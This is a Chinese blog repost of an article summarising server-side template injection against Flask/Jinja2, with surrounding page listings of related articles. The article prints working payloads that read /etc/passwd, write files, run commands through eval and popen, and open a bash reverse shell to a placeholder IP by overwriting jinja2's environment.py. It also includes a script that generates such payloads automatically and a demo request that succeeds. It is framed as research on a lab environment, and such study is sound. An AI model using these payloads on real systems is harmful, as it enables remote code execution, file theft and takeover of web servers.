jinja2模板注入_Flask jinja2模板注入思路总结

最新推荐文章于 2024-08-07 15:27:34 发布
最新推荐文章于 2024-08-07 15:27:34 发布
阅读量526 收藏
点赞数
文章标签: jinja2模板注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32724679/article/details/113013341
版权

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

前言

虽然这个漏洞已经出现很久了,不过偶尔还是能够看到。翻了翻freebuf上好像只有python2的一些payload,方法也不是很全。我找来找去也走了些弯路,小白们可以参考一下。如果有什么错误,欢迎各位指正。

漏洞简介

漏洞原理可以参考

常见payload

ssti可以用于xss,不过这里不具体介绍; 前面两篇文章给出了几个比较常用的getshell的payload; 我会总结并补充一些。

python2:#注入变量执行命令详见 http://www.freebuf.com/articles/web/98928.html

#读文件:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

#写文件:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/1').write("") }}

也可以通过写jinja2的environment.py执行命令; jinja2的模板会load这个module,而且这个environment.py import了os模块, 所以只要能写这个文件,就可以执行任意命令:#假设在/usr/lib/python2.7/dist-packages/jinja2/environment.py, 弹一个shell

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/usr/lib/python2.7/dist-packages/jinja2/environment.py').write("\nos.system('bash -i >& /dev/tcp/[IP_ADDR]/[PORT] 0>&1')") }}

python3:#命令执行:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

#文件操作

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}

Go Deeper

环境

这里给出的是vulhub的flask ssti漏洞环境 方便复现#python3

#Flask version:0.12.2

#Jinja2: 2.10

from flask import Flask, request

from jinja2 import Template

app = Flask(__name__)

@app.route("/")

def index():

name = request.args.get('name', 'guest')

t = Template("Hello " + name)

return t.render()

if __name__ == "__main__":

app.run();

__globals__

其实这些payload的思路大概都是一样的,从python的内置变量出发,通过调用各类型的一些隐藏属性(方法),从而得到我们需要的函数。

其中有一个属性 globals 很有意思,文档里这样解释:__globals__:

A reference to the dictionary that holds the function’s global variables —

the global namespace of the module in which the function was defined.

[Read-only]

也就是说所有的函数都会有一个__globals__属性,它会以一个dict,返回函数所在模块命名空间中的所有变量。 举个例子:outFuncVar = 2

def func():

inFuncVar = 1

pass

print(func)

print(func.__globals__)

import os

print(func.__globals__)

这段代码输出

{'outFuncVar': 2, , '__builtins__': }

{'outFuncVar': 2, , 'os': , '__builtins__': }

可以看到__globals__中会包括引入了的modules;同时每个python脚本都会自动加载 builtins 这个模块,而且这个模块包括了很多强大的built-in 函数,例如eval, exec, open等等。>>>def test():

pass

>>>test.__globals__['__builtins__']

>>>test.__globals__['__builtins__'].eval

>>>test.__globals__['__builtins__'].exec

>>>test.__globals__['__builtins__'].open

所以要从内置变量出发找到一个可以达成payload的函数(eval, exec..),只需要随便从一个内置变量调用隐藏属性,找到任意一个函数,然后查看它的__globals__['__builtins __']就可以了,而这个是非常容易的。

start to find a payload

我们都知道python的类有被称为Special method names的方法,这些方法会在特定的时候被调用。而开发者可以通过重载这些函数实现各种简洁又强大的功能。例如class.__init __ 会在一个实例被new()创建的时候自动调用,从而起到构造函数的作用。

而我们的目标只是找到任意一个函数,所以我们只需要去找这些函数就可以了,比如说从字符串开始#python3

#__class__返回调用的参数类型

#__base__返回基类

#__mro__寻找基类时参考类

#__sublclasses__()返回子类

#获得 object 类的子类

>>> ''.__class__.__base__.__subclasses__()

[, , , , , , , , ...]

#从中随便选一个类,查看它的__init__

>>> ''.__class__.__base__.__subclasses__()[30].__init__

# wrapper是指这些函数并没有被重载,这时他们并不是function,不具有__globals__属性

>>> ''.__class__.__base__.__subclasses__()[30].__init__.__globals__

Traceback (most recent call last):

File "", line 1, in

''.__class__.__base__.__subclasses__()[30].__init__.__globals__

AttributeError: 'wrapper_descriptor' object has no attribute '__globals__'

#再换几个子类,很快就能找到一个重载过__init__的类,比如

>>> ''.__class__.__base__.__subclasses__()[5].__init__

>>> ''.__class__.__base__.__subclasses__()[5].__init__.__globals__['__builtins__']['eval']

#然后用eval执行命令即可

其中寻找function的过程可以用一个小脚本解决, 脚本找到被重载过的function,然后组成payload#!/usr/bin/python3

# coding=utf-8

# python 3.5

from flask import Flask

from jinja2 import Template

# Some of special names

searchList = ['__init__', "__new__", '__del__', '__repr__', '__str__', '__bytes__', '__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__', '__hash__', '__bool__', '__getattr__', '__getattribute__', '__setattr__', '__dir__', '__delattr__', '__get__', '__set__', '__delete__', '__call__', "__instancecheck__", '__subclasscheck__', '__len__', '__length_hint__', '__missing__','__getitem__', '__setitem__', '__iter__','__delitem__', '__reversed__', '__contains__', '__add__', '__sub__','__mul__']

neededFunction = ['eval', 'open', 'exec']

pay = int(input("Payload?[1|0]"))

for index, i in enumerate({}.__class__.__base__.__subclasses__()):

for attr in searchList:

if hasattr(i, attr):

if eval('str(i.'+attr+')[1:9]') == 'function':

for goal in neededFunction:

if (eval('"'+goal+'" in i.'+attr+'.__globals__["__builtins__"].keys()')):

if pay != 1:

print(i.__name__,":", attr, goal)

else:

print("{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='" + i.__name__ + "' %}{{ c." + attr + ".__globals__['__builtins__']." + goal + "(\"[evil]\") }}{% endif %}{% endfor %}")

output{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='_Unframer' %}{{ c.__init__.__globals__['__builtins__'].exec("[evil]") }}{% endif %}{% endfor %}{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='ImmutableDictMixin' %}{{ c.__hash__.__globals__['__builtins__'].eval("[evil]") }}{% endif %}{% endfor %}{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='ImmutableDictMixin' %}{{ c.__hash__.__globals__['__builtins__'].open("[evil]") }}{% endif %}{% endfor %}...

随便选一个payload填上命令#Client request

http://127.0.0.1:5000/?name={% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='ImmutableDictMixin' %}{{ c.__hash__.__globals__['__builtins__'].eval("print('hello shell')") }}{% endif %}{% endfor %}

#server terminal

#成功打印出hello shell,说明成功执行

hello shell

127.0.0.1 - - [10/Feb/2018 02:41:48] "GET /?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27ImmutableDictMixin%27%20%}{{%20c.__hash__.__globals__[%27__builtins__%27].eval(%22print(%27hello%20shell%27)%22)%20}}{%%20endif%20%}{%%20endfor%20%} HTTP/1.1" 200 -

当然这种方法不仅仅适合python3, python2也可以用这个方法,上面那个payload就是两个版本都可以使用的。

总结

利用flask的ssti漏洞,可以通过python的内置变量得到功能强大的built-in functions, 从而执行各种命令。而python函数自带的__globals__属性使得寻找built-in functions的过程变得更加简单,不受版本约束。

* 本文作者:请叫我飞翔的翔,转载注明来自FreeBuf.com

MooliHui
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jinja2模版的基本使用以及防止模版漏洞注入的方案
代码讲故事
08-16 293
jinja2模版的使用以及防止模版漏洞注入的方案,提出了实现类似效果的替代方案。 jinja2Flask作者开发的一个模板系统,起初是仿django模板的一个模板引擎,为Flask提供模板支持,由于其灵活,快速和安全等优点被广泛使用。 官网地址:https://jinja.palletsprojects.com/en/3.0.x/ Jinja2是Python下一个被广泛应用的模版引擎,他的设计思想来源于Django的模板引擎,并扩展了其语法和一系列强大的功能。其中最显著的一个是增加了沙箱执行功能和可选的自
Python Flask学习_使用Jinja2模板响应请求
bird333的博客
06-16 1335
模板是一个 包含响应文本的文件,其中包含用占位符表示的动态部分。<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>User</title> </head> &lt
jinja2模板注入_flask/jinja2模板注入
weixin_30802953的博客
01-17 725
Flask是什么Flask是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用 Werkzeug ,模板引擎则使用 Jinja2 。就是部网站用的简单hello worldfrom flask import Flaskapp = Flask(__name__)@app.route("/")def hello():return "Hello World!"if __na...
Jinja2模板注入
你也听过我的故事?
10-25 1623
Jinja2模板注入常见的利用方式及简单绕过方法
[CSCCTF 2019 Qual]FlaskLight (jinja2模版注入)
最新发布
weixin_73399382的博客
08-07 470
这种有参数的我先直接丢fengjing扫了一下,结果还真搞出来,这工具还是挺牛的,就是没参数的时候搞不了。输入{{7*‘7’}},返回7777777表示是 Jinjia2 模块。进入web界面输入前三个参数,表单输入就是刚才的search参数。输入{{config}}查看配置发现提示flag就在当前目录下。分析完后右边会提示你输入可以输入命令自动生成payload。或者中间加个+号也可以['__glo'+'bals__']输入{{7*‘7’}},返回49表示是 Twig 模块。下面是判断模版注入的方法。
jinja2模板注入_Flask jinja2 模板注入思路总结
weixin_32784349的博客
01-17 493
Flask jinja2 模板注入思路总结前言虽然这个漏洞已经出现很久了, 不过偶尔还是能够看到翻了翻 freebuf 上好像只有 python2 的一些 payload, 方法也不是很全我找来找去也走了些弯路, 小白们可以参考一下如果有什么错误, 欢迎各位指正漏洞简介漏洞原理可以参考http://www.freebuf.com/articles/web/98619.htmlhttp://www....
探索Flask/Jinja2中的服务端模版注入(二)
大方子
08-19 817
在探索Flask/Jinja2中的服务端模版注入Part1中,我最初的目标是找到文件的路径或者说是进行文件系统访问。之前还无法达成这些目标,但是感谢朋友们在之前文章中的反馈,现在我已经能够实现这些目标了。本文就来讲讲进一步研究获得的结果。 神助攻 对于之前的文章,感谢Nicolas G 对我们的帮助 如果你有玩玩这个payload,你很快就会清楚这是行不通的。这里有有几个比较合理的解释,...
模板注入与_FLASK.pdf
08-08
本次议题结合Flask框架及其使用的Jinja2模板,讲解了模板注入的原理、注入手段和一些绕过方式,以及结合Python沙盒逃逸思路的一些攻击手段,最后针对模板注入漏洞的发现及防御进行了一些讨论。 模板注入基本成因 ...
flask框架jinja2模板模板继承实例分析
01-20
本文实例讲述了flask框架jinja2模板模板继承。分享给大家供大家参考,具体如下: jinja2模板 from werkzeug.contrib.cache import SimpleCache from flask import Flask, request, render_template,redirect,...
jinja2模板注入_利用 Python 特性在 Jinja2 模板中执行任意代码
weixin_31226805的博客
01-17 390
对于 Jinja2 模板引擎是否能够在 SSTI 的情况下直接执行命令原文并没有做出说明,并且在 Jinja2 官方文档中也有说明,模板中并不能够直接执行任意 Python 代码,这样看来在 Jinja2 中直接控制模板内容来执行 Python 代码或者命令似乎不太可能。一、模板中复杂的代码执行方式最近在进行项目开发时无意中注意到 Jinja2 模板中可以访问一些 Python 内置变量,如 []...
Flask框架——(Jinja2模板)
weixin_45550881的博客
04-14 614
Flask框架——(Jinja2模板) 1. Jinja2模板介绍 模板是⼀个web开发必备的模块。因为我们在渲染⼀个⽹⻚的时候,并不是只渲染⼀个纯⽂本字符串,⽽是需要渲染⼀个有富⽂本标签的⻚⾯。这时候我们就需要使⽤模板了。在Flask中,配套的模板Jinja2Jinja2的作者也是Flask的作者。这个模板⾮常的强⼤,并且执⾏效率⾼。 2. ...
python Jinja2 模板编程
JohnSon
02-28 1308
Jinja2基本语法 {% %} 控制结构,可以用来写判断循环等语句 {{}} 变量取值 {# #} 注释 快速入门的例子 from jinja2 import Template ## ex1 t = Template("hello {{person}}") msg = t.render(person="bob") print(msg) # hello bob ## ex2 t = Te...
python jinja2
lzyjzb的博客
12-08 362
from jinja2 import Template template = Template(‘Hello {{ name }}’) print(template.render(name=‘dsg’)) > output: Hello dsg template = Template(‘service: {{ service.name }}, version: {{ service.version }}’) service = {‘name’: ‘mysql’, ‘version’: 5.7} pri
Python-Flask框架(四), jinja2模板注入
Huifeng Tang 的博客
11-24 2288
Python-Flask框架, 如何进行模板注入?
Python之jinja2
weixin_30723433的博客
06-30 205
jinja2简介 python的模板引擎,设计思想来自与django的模板引擎,和其非常相似 pip install jinjia2 pip install MakeupSafe #模块加载 from jinja2 import Template # template = Template('hello {{name}}') # print(template.rende...
Flask(9) - jinja2模板使用(宏和import)
11-19 496
宏 <!--使用宏模板创建登录表单--> <!-- 模板中的宏和python中的函数类似,可以传递参数(参数可以是默认值),但是没有返回值,可以将复用 的代码片段放到宏中,把一些不固定的值抽取出来做一个变量 --> <!DOCTYPE html> <html lang="en"> <head> <meta chars...
Python Jinja2:强大易用的模板引擎
weixin_68789096的博客
10-20 3921
总之,Jinja2是一个功能强大、易于使用和扩展的Python模板引擎,适用于各种需要模板引擎的应用场景。掌握它的基本功能能够提高我们的开发效率和代码可维护性,使我们能够更专注于实现应用程序的功能和需求。本文转自,如有侵权,请联系删除。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值